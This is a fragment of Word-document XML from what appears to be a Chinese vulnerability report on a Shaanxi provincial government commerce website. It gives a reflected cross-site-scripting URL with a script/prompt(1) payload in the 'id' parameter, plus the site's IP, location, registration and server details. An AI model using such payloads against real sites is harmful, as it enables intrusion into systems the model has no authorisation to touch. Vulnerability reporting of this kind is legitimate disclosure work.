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注入网址:http://sp.shaanxi.gov.cn:9004/qas/index?id=&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;764</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞参数:id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http://sp.shaanxi.gov.cn:9004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http://sp.shaanxi.gov.cn:9004</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>IP__坐标  陕西省西安市 联通</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>所属__IP  113.200.80.179</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站年龄  18年9月5天（创建于2000年08月12日,过期时间为2022年08月12日)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案编号  陕ICP备08000622号-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案性质  政府机关</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案名称  陕西省商务厅</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案时间  2019/4/18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Apache-Coyote/1.1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http://sp.shaanxi.gov.cn:9004/qas/index?id=&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;764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.shaanxi.gov.cn_90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